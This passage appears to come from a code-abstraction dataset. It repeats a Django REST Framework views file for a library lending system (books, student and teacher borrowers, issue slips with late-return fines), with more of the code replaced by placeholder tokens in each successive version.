= Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n\n\nclass CustomAuthToken(ObtainAuthToken):\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={\n 'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key, 'user_id': user.pk, 'email':\n user.email})\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n\n\nclass CustomAuthToken(ObtainAuthToken):\n <function token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n authentication_classes = TokenAuthentication,\n permission_classes = ReadBookPermission,\n queryset = Book.objects.all()\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n\n def destroy(self, request, pk):\n book = self.get_object()\n book.is_active = False\n book.is_available = False\n book.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BookSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BookDetailSerializer\n return BookDetailSerializer\n <function token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n\n\nclass BookViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='S')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateStudentPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n student = self.get_object()\n student.is_active = False\n student.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass StudentViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n <function token>\n\n\nclass TeacherViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.filter(borrower_type__iexact='T')\n authentication_classes = TokenAuthentication,\n permission_classes = ReadUpdateTeacherPermission,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n def destroy(self, request, pk):\n teacher = self.get_object()\n teacher.is_active = False\n teacher.save()\n return Response(\"{'message':'Deleted'}\", status=status.HTTP_200_OK)\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n 